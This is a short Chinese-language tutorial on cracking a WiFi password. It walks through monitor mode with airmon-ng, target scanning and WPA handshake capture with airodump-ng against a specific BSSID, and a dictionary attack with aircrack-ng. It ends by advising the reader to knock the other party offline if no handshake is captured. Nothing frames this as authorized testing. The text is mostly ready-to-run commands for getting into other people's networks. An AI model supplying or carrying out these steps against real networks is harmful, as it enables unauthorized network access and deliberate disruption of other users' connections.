工具:
1:笔记本
2:USB无线网卡(必备)
3:kali系统
4:靠谱字典
第一种方法:
暴力破解法
何为暴力破解呢,其实就是一个一个密码试,直到正确的密码为止。
现在的wifi一般加密都是:
1、不启用安全2、WEP
3、WPA/WPA2-PSK(预共享密钥)
4、WPA/WPA2 802.1X (radius认证)
使用airmon-ng命令检查网卡是否支持监听模式
root@kali:~# airmon-ng
可以看到无线网卡wlan0是支持监听模式的。如果该命令没有任何输出则表示没有可以支持监听模式的网卡。
开启无线网卡的监听模式
root@kali:~# airmon-ng start wlan0
开启监听模式之后,无线接口wlan0变成了wlan0mon,可以使用ifconfig命令查看
扫描环境中的WiFi网络
root@kali:~# airodump-ng wlan0mon
使用airodump-ng 命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等。这里我们记下要破解WiFi的BSSID和信道,如图中我用红色标记出来的。当搜索到我们想要破解的WiFi热点时可以 Ctrl+C 停止搜索。
抓取握手包
使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。
抓包:
root@kali:~# airodump-ng -c 4 --bssid 1C:60:DE:9D:6F:A6 -w hack wlan0mon
参数解释:
-c 指定信道,上面已经标记目标热点的信道
-bssid指定目标路由器的BSSID,就是上面标记的BSSID
-w指定抓取的数据包保存的目录
(抓包成功)
可以开新命令窗进行破解WIFI密码(跑包)
aircrack-ng -a2 -b 1C:60:DE:9D:6F:A6 -w pass.txt hack-01.cap
完成
注意:如果抓不到包就把对方踢下线,这样就会抓包成功